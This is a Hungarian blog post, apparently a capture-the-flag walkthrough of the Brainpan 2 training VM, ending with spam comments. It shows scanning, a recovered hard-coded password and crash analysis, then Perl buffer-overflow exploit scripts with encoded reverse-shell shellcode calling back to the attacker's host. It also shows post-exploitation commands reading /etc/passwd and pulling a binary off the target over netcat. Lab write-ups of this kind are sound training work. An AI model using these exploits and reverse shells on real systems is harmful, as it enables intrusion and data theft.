2014. január 17., péntek

Brainpan - 2

root@kali:~# netdiscover

192.168.56.104

root@kali:~# unicornscan -mT 192.168.56.104

TCP open                ndmp[10000]

root@kali:~# nmap -sS -A 192.168.56.104 -pT:10000

10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

root@kali:~# nmap -sT 192.168.56.104 -pT:1-65535

9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

root@kali:~# nmap -sS -A 192.168.56.104 -pT:9999

SF-Port9999-TCP:V=6.40%I=7%D=1/16%Time=52D7DAB2%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");

root@kali:~# nc 192.168.56.104 9999

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

http://192.168.56.104:10000/

root@kali:~# nikto -host 192.168.56.104 -port 10000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        10000
+ Start Time:         2014-01-16 14:21:40 (GMT1)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ 6544 items checked: 25 error(s) and 4 item(s) reported on remote host
+ End Time:           2014-01-16 14:21:52 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

http://192.168.56.104:10000/bin/

brainpan.exe (downloaded)

root@kali:~# hd brainpan.exe | more

4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|

This is a Windows executable.

root@kali:~# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

root@kali:~# netstat -nl | grep 9999

tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

root@kali:~# strings brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             
                          >>
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
WSACleanup
WSAGetLastError
WSAStartup
accept
bind
closesocket
htons
listen
recv
send
socket
KERNEL32.dll
msvcrt.dll
WS2_32.DLL

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

root@kali:~# nc 192.168.56.104 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

The password is shitstorm.

This is maybe a buffer owerflow challenge....

I send a BIG string to password...

[get_reply] s =

[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(■B]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x61616161 at address 0x61616161 (thread 0009), starting debugger...
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:61616161 ESP:0042f810 EBP:61616161 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  61616161 61616161 61616161 61616161
0x0042f820:  61616161 61616161 61616161 61616161
0x0042f830:  61616161 61616161 61616161 61616161
0x0042f840:  61616161 61616161 61616161 61616161
0x0042f850:  61616161 61616161 61616161 61616161
0x0042f860:  61616161 61616161 61616161 61616161

Hexa 61 = 'a'

root@kali:~# hexeditor overflow.txt

root@kali:~# nc 127.0.0.1 9999 < overflow.txt

...
bbbbabcdabcdefghijklmnopqrstuvwxyz{|}~

[get_reply] copied 540 bytes to buffer

 EIP:69686766 ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  6d6c6b6a 71706f6e 0a747372 00000000
0x0042f820:  00000000 00000000 00000000 00000000

EIP : 69686766 (ihgf) EBP: 65646362 (edcb)

Stack: mlkj qpon utsr yxwv
       }|{z

EIP -> ESP, 69686766 (ihgf) -> 0042f810 

It Doesn't work because the 00 byte.

root@kali:~# wine OLLYDBG.EXE ../brainpan.exe

Search JMP ESP -> 0x311712f3

root@kali:~# hexeditor overflow.txt

[get_reply] copied 550 bytes to buffer
wine: Unhandled page fault on read access to 0xffffffff at address 0x42f88d (thread 002d), starting debugger...
Unhandled exception: page fault on read access to 0xffffffff in 32-bit code (0x0042f88d).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f88d ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  90909090 71909090 75747372 79787776
0x0042f820:  7d7c7b7a 00000a7e 00000000 00000000
0x0042f830:  00000000 00000000 00000000 00000010
0x0042f840:  00000000 00000000 00000000 00000000
0x0042f850:  5da40002 0100007f 00000000 00000000
0x0042f860:  0f270002 00000000 00000000 00000000

root@kali:~# pico buf_ov.pl

#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}


$baddata = "A" x 524; #  524 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); #  JMP ESP
$baddata .= "C" x (3000 - length($baddata)); # extends $baddata with "C"

$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on write access to 0x00000073 at address 0x42f9eb (thread 0009), starting debugger...
Unhandled exception: page fault on write access to 0x00000073 in 32-bit code (0x0042f9eb).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f9eb ESP:0042f810 EBP:41414141 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b8a61cc ECX:00000073 EDX:00429501
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  43434343 43434343 43434343 43434343
0x0042f820:  43434343 43434343 43434343 43434343
0x0042f830:  43434343 43434343 43434343 43434343
0x0042f840:  43434343 43434343 43434343 43434343
0x0042f850:  43434343 43434343 43434343 43434343
0x0042f860:  43434343 43434343 43434343 43434343

root@kali:~# msfpayload  windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 C | msfencode -a x86 -b '\x00\x0a\x0d' -t perl

...

root@kali:~# pico buf_ov.pl

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
err:seh:setup_exception_record stack overflow 1648 bytes in thread 0009 eip 7bc411a8 esp 00230cc0 stack 0x230000-0x231000-0x430000

root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
[*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

my $buf =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

root@kali:~# pico buf_ov2.pl

#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}

$nop = "\x90"; # x86 NOP
$baddata = "A" x 524; #  520 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); #  JMP ESP
$baddata .= $nop x 16;
$baddata .=
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket

root@kali:~# nc -l -p 1234

root@kali:~# perl buf_ov2.pl 192.168.56.104 9999

...

id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
pwd
/home/puck
ls
checksrv.sh
web
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash

netstat -nlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      995/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      914/python     
udp        0      0 0.0.0.0:19733           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -              
udp6       0      0 :::2659                 :::*                                -              
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     SEQPACKET  LISTENING     6957     -                   /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     6769     -                   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     7573     -                   /var/run/samba/winbindd_privileged/pipe
unix  2      [ ACC ]     STREAM     LISTENING     7572     -                   /tmp/.winbindd/pipe
unix  2      [ ACC ]     STREAM     LISTENING     9488     999/wineserver      socket
unix  2      [ ACC ]     STREAM     LISTENING     7418     -                   /var/run/dbus/system_bus_socket

cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:

cat checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep brainpan.exe | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
    fi
    cd /home/puck/web
    /usr/bin/python -m SimpleHTTPServer 10000
fi

find / -type f -perm -04000 -ls
525499   64 -rwsr-xr-x   1 root     root        63632 Sep  6  2012 /bin/umount
525495   32 -rwsr-xr-x   1 root     root        31124 Sep  6  2012 /bin/su
525498   88 -rwsr-xr-x   1 root     root        88768 Sep  6  2012 /bin/mount
530420   32 -rwsr-xr-x   1 root     root        30112 Jun 11  2012 /bin/fusermount
525651   40 -rwsr-xr-x   1 root     root        39124 Oct  2  2012 /bin/ping6
525650   36 -rwsr-xr-x   1 root     root        34780 Oct  2  2012 /bin/ping
...
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudo
672442   60 -rwsr-xr-x   1 root     root        60344 Jun 18  2012 /usr/bin/mtr
658477   32 -rwsr-xr-x   1 root     root        30936 Sep  6  2012 /usr/bin/newgrp
658673   32 -rwsr-xr-x   1 root     root        31756 Sep  6  2012 /usr/bin/chsh
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudoedit
658676   40 -rwsr-xr-x   1 root     root        40300 Sep  6  2012 /usr/bin/chfn
672094   16 -rwsr-xr-x   1 root     root        14020 Oct  2  2012 /usr/bin/traceroute6.iputils
671718   48 -rwsr-sr-x   1 daemon   daemon      46576 Jun 11  2012 /usr/bin/at
675550   16 -rwsr-xr-x   1 root     lpadmin     13672 Dec  4  2012 /usr/bin/lppasswd
658671   44 -rwsr-xr-x   1 root     root        41292 Sep  6  2012 /usr/bin/passwd
658667   60 -rwsr-xr-x   1 root     root        57964 Sep  6  2012 /usr/bin/gpasswd
672668   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Sep  6  2012 /usr/sbin/uuidd
672521  296 -rwsr-xr--   1 root     dip        301944 Sep 26  2012 /usr/sbin/pppd
656771   12 -rwsr-xr-x   1 anansi   anansi       8761 Mar  4  2013 /usr/local/bin/validate
925433  312 -rwsr-xr--   1 root     messagebus   317564 Oct  3  2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
925584  244 -rwsr-xr-x   1 root     root       248064 Sep  6  2012 /usr/lib/openssh/ssh-keysign
788361    8 -rwsr-xr-x   1 root     root         5452 Jun 25  2012 /usr/lib/eject/dmcrypt-get-device
657855   12 -rwsr-xr-x   1 root     root         9740 Oct  3  2012 /usr/lib/pt_chown

find / -perm -2 -ls
...

/usr/local/bin/validate
usage /usr/local/bin/validate <input>
/usr/local/bin/validate aaaa
validating input...passed.
/usr/local/bin/validate
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

root@kali:~# nc -l -p 12345 > validate

nc 192.168.56.101 12345 < /usr/local/bin/validate

root@kali:~# ls -al validate
-rw-r--r-- 1 root root 8761 jan   17 11:47 validate
root@kali:~# ./validate
bash: ./validate: Engedély megtagadva
root@kali:~# chmod 744 validate
root@kali:~# ./validate
usage ./validate <input>

I'm not ready yet to solve this task...

3 megjegyzés:

  1. Searching for the Ultimate Dating Site? Join and find your perfect date.

    VálaszTörlés
  2. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you have to watch this video
    right away...

    (VIDEO) Win your ex back with TEXT messages?

    VálaszTörlés
  3. BlueHost is definitely the best hosting company for any hosting services you might need.

    VálaszTörlés